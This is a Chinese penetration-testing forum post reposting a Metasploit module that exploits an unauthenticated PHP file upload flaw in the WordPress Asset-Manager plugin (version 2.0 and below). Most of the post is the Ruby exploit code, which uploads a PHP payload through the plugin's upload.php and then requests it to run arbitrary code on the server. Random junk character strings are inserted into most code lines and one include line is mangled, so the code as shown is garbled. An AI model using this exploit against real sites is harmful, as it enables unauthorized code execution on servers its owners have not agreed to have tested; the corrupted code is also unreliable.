找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1888|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
1 a$ e+ M6 Z& [, L5 N0 Q
; C+ t# b1 N/ O( ?/ g/ Q, L! s% ^##$ A+ H3 B4 l; d6 J
# This file is part of the Metasploit Framework and may be subject to
# g+ E$ V. l& v' k* Z6 b, Q% [3 X9 ~# redistribution and commercial restrictions. Please see the Metasploit$ S" x* K* F$ p/ ~  N9 F
# Framework web site for more information on licensing and terms of use.
* l9 g$ y; F5 z6 b#   http://metasploit.com/framework/
( n  w* g& j! D% x! F##
; y+ z; c' T; H
& ~3 n# u0 B- c. k5 J; c+ krequire 'msf/core'
! O$ n0 {# I+ F* d. d. v# Lrequire 'msf/core/exploit/php_exe'/ e( M9 I0 W9 x6 A7 h

1 X; Z0 I7 V% {7 T! j" nclass Metasploit3 < Msf::Exploit::Remote, {+ g. _# U- L' \
  Rank = ExcellentRanking
2 m/ H& _3 ]& ?7 |/ B+ R- p/ W
$ U. u6 V0 B) h9 e  D% O  include Msf::Exploit::Remote::HttpClient$ w+ q' J$ s# Y" ?
  include Msf::Exploit:hpEXE1 z* `. H0 I* R

" V7 M8 ?7 V9 D  def initialize(info = {}). K+ u' G' T6 ^5 v$ u4 P' J
    super(update_info(info,
( G4 H: v- r6 f+ S8 |0 a      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
0 v9 Z) X  r: i4 S  [3 B% a, i      'Description'    => %q{
; B7 z7 p, o) |* A8 G        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
$ Y- C: _6 i- S$ d1 x/ {0 o, h        plugin.  By abusing the upload.php file, a malicious user can upload a file to a; W; W6 p7 P; d
        temp directory without authentication, which results in arbitrary code execution.  g, E$ x3 a" w7 _5 F6 L
      },* C3 l( C, Y; ?" ~9 c8 s
      'Author'         =>; ^- a+ k9 P3 K" l5 [+ ?7 T+ ~9 J
        [' X( ~% u3 R' d) q
          'Sammy FORGIT', # initial discovery
% N1 F. I0 I( X! s          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
8 R/ _6 _4 H0 |/ B" h, L" g        ],
( }6 T! O7 z' w2 ~      'License'        => MSF_LICENSE,# F1 e, S* O+ T
      'References'     =>( n2 [/ l% f9 k* ^
        [
9 C! ~1 D' k7 j0 a% _          [ 'OSVDB', '82653' ],
! Z. `3 w( O# G. ]' R% w" W2 r& S          [ 'BID', '53809' ],
+ J7 I% @. c. ]: ~          [ 'EDB', '18993' ],
6 V3 z( C, G7 A' _$ p9 D          [ 'URL', 'http:// www.myhack58.com /' ]1 t3 `# p0 W1 x+ r
        ],- v, f! R' @' @* Z: B0 P
      'Payload'       =>
' l8 ]/ f! L! ]7 ]+ V/ e        {
) L/ u/ ?' X" B- e- Y          'BadChars' => "\x00",# G  F* q/ x8 E! ~- `9 H3 b0 ?% G  G
        },
3 t% b0 Z& k3 ~      'Platform'       => 'php',3 f* e9 Y2 F+ f/ j( ?# \
      'Arch'           => ARCH_PHP,7 T6 T2 X2 [2 l
      'Targets'        =>
# P! S+ G2 N/ \- f        [
% S, h: s/ B* h8 M+ \          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
- r& A7 P& \2 y3 y1 I          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
% v! ~7 J7 K0 d$ }! H% U, J) ^/ \        ],
* _! F- `, t( ~# j      'DefaultTarget' => 0,4 U* [* |: r8 |( t! \3 R4 W7 S: D
      'DisclosureDate' => 'May 26 2012'))5 H" ^* J1 g) ~+ p

, K2 ^/ e  Q) G" t! W    register_options(
* j) X# |, i2 r      [
. @/ e, p% n; e* Y9 {& F2 S        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
+ K2 v( x/ r5 q2 C      ], self.class)
; V4 ~  c7 B$ C" ?% ]; x  end
+ b6 r; x. i# a" {" R: A% q/ v
. F4 M* t2 D! o+ V3 T/ F  def exploit
1 P9 u7 U& z1 s( m/ l# u: E: O    uri =  target_uri.path
: t6 b6 G' D' E    uri << '/' if uri[-1,1] != '/'
6 E; u: l& p1 [* C! R) q    peer = "#{rhost}:#{rport}"' K  `: R" y3 p( C
    payload_name = "#{rand_text_alpha(5)}.php"9 c- _& O1 H8 D
    php_payload = get_write_exec_payload(:unlink_self=>true)# @9 ]" T4 E; S; {) _" E: c3 v

: J. i8 a8 ^' H0 |, |; n$ ~    data = Rex::MIME::Message.new
) p* E: W* H( x: _4 \    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
! m3 i) T* ]8 ]' M. G    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')% X9 F, o; v5 d

: L: U5 e. S7 ]" j3 L    print_status("#{peer} - Uploading payload #{payload_name}")
; \8 f: r- w( W: ]    res = send_request_cgi({
. _+ h1 V9 I0 M% K0 ^      'method'  => 'POST',$ e& @$ h+ x& C+ D4 |& u
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",( o0 n1 T+ m2 V" d' b4 F  B+ Z
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",0 e% [2 M- ^# s3 h( O
      'data'    => post_data* q" o. D' O8 k! e8 D* z
    })
+ i2 A5 U( r4 r
# p4 A, G+ j3 m    if not res or res.code != 200 or res.body !~ /#{payload_name}/
8 l5 V/ F3 L  _- l      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")* {0 P5 m8 e, ^2 Q. i3 P
end
9 Z- D1 [7 [$ [- H2 U1 [/ O
2 N3 c8 K6 _& X; Q+ y; R+ _    print_status("#{peer} - Executing payload #{payload_name}")" v5 _2 z9 g  P/ @
    res = send_request_raw({
* N( _9 D+ Z9 c$ G' |% e' k      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",  g3 P* ?+ K' l; E  A
      'method'  => 'GET'
/ t+ `# O0 r/ E2 u! A: H! V* w+ @( C- z    })  ]( G' |# h$ v" Y+ ?

3 E. N7 O) W5 P& k6 p0 I    if res and res.code != 200
% s  h- w+ w; h5 P) b* {, X      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")7 s6 a9 p3 U% {3 }% V$ l, e: K
    end* O, W; D) [( ^: s
  end; B0 w% S8 {7 x8 w' N7 M( I9 f
end2 Z4 y' x! C$ N3 X. q( }
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表